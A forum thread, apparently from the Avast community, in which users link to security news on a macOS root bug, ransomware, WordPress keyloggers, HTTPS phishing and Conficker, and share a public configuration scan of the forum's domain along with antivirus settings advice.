bob3160
5541
If you have a Mac, you have a Security problem.
Here’s how to fix it untill Apple comes up with a patch.
https://www.howtogeek.com/334611/huge-macos-bug-allows-root-login-without-a-password.-heres-the-fix/
polonus
5542
bob3160
5543
New Shadow BTCware Ransomware Variant Released
A new variant of the BTCWare ransomware was discovered by Michael Gillespie, that appends the .[email]-id-id.shadow extension to encrypted files. The BTCWare family of ransomware infections targets its victims by hacking into poorly protected remote desktop services and manually installing the ransomware.
Asyn
5545
Pondus
5546
polonus
5547
forum dot avast dot com site’s nameservers configuration security issue:
Stealth name servers Failed Found name servers which are listed by the authoritative servers, but not by the parent ones:
ns6.avast.com at ns2.avast.com
sns.avast.com at ns2.avast.com
sns.avast.com at pns.avast.com
ns6.avast.com at pns.avast.com
Another issue
Google Apps settings Warning The top priority mail server is ASPMX.L.GOOGLE.com, but TTL is not equal to the recommended value (86400).
On cert:
Supported cipher suites Warning Your server supports suboptimal cipher suites:
DES-CBC3-SHA
Quotes above taken from a public scan at Threat Intelligence Platform for -
https://forum.avast.com
polonus (volunteer website security analyst and website error-hunter)
polonus
5548
Keylogger activity on thousands of hacked WordPress sites:
https://blog.sucuri.net/2017/12/cloudflare-solutions-keylogger-on-thousands-of-infected-wordpress-sites.html
polonus (volunteer website security analyst and website error-hunter)
P.S. Instruction to find the malscript in given Sucuri blog post link
: The injected part of this malware didn’t change at all, using the theme’s function.php to enqueue the following scripts to WordPress pages.
Read on the problem of bitcoin mining scripts and how avast will keep us secure:
https://blog.avast.com/avast-blocked-more-than-34-million-monero-cryptomining-attacks
(blog post credits: avast’s Denis Konopisky)
D
polonus
5549
polonus
5550
Spyware inside printer software (weakly protected as usual)
is the royal way into your firm network for spies and sp**ks:
Re: https://zwclose.github.io/HP-keylogger/
When they are in your printer they are inside your network.
With all the spyware added lately to all kind of hardware,
it seems consumer rights are being violated on a grand scale everywhere,
and nobody seems to take your consumer rights seriously.
polonus
polonus
5551
Do not get it wrong. 25% of PHISHING websites now offer secure connections.
These certifiied websites (Comodo or Let’s Encrypt certification) have a green padlock,
so Mr. and Mrs. Average End-user will think such websites are safe. They are not!
They only have a secure connection to… unsafety!
Read: https://info.phishlabs.com/blog/quarter-phishing-attacks-hosted-https-domains
polonus
polonus
5552
This will implement with avast we will have to untag “no scanning of trusted websites”,
but have all websites scanned, marked as trusted and not trusted alike.
Because in this case it could be a trusted phishing site (a contradictio in terminis),
that we tagged not to be scanned by avast. Capito? Always set to scan all sites!
polonus
mchain
5553
Here is how to have avast scan all websites. See attached below.
As ‘Do not scan trusted websites’ is already checked off by default, so in order to have avast scan all websites, including trusted ones, this box must be cleared off and the check removed.
Should be noted that a clean install will always restore this setting to not scan trusted websites so it is one of the things that must be checked on a new install of avast if you do not wish this behavior.
bob3160
5554
polonus
5555
Thank you, bob3160, for keeping everybody secure with this message,
together with your very clear picture and additional arrows,
that go the right direction. ;D 
Hope everybody stays safe that way.
Damian
Pondus
5556
CONFICKER / DOWNAD / DOWNADUP 9 Years After
http://blog.trendmicro.com/trendlabs-security-intelligence/conficker-downad-9-years-examining-impact-legacy-systems/
CVE-2008-4250 dominates our detections for vulnerabilities, with over 60,000 for the month of October 2017 alone.
All these clues paint a picture of the typical DOWNAD victim: organizations in key industries, typically from developing countries, that use outdated, unpatched legacy systems as an integral part of their network.
Conficker > https://en.wikipedia.org/wiki/Conficker
Until recently two versions of conficer was still on F-Secure top 10 detections evry 24H
VirusMap > http://worldmap3.f-secure.com/
polonus
5557
Hi Pondus,
According toTrend Micro Conficker can be characterized as"background-malware", specially being active on legacy-systems.
“Not quite as interesting to a larger audience like modern malware like WannaCry & Petya, it still is a persistent threat and will be so as long as no longer supported, unpatched legacy systems form part of corporate networks”.
polonus
polonus
5558
Problem with bogus EV SSL-certificates has been demonstrated by researcher:
Read: https://twitter.com/iangcarroll/status/940281927789146112
Costed the researcher under half an hour and 177 dollars to spoof the real extended validated certificate.
Is this a danger? And how it is!
More and more is shown that certification online has the same problems.
than all of the rest of the infrastructure, it is pn*wed and holed from all sites around
to serve black hat and other sp**ks from your own government together with cybercriminals all sorts.
If they wanna target you in person, you are birdfeed in no time,
and all the time the going gets narrower. ;D :
>:(
polonus
Pondus
5559
bob3160
5560
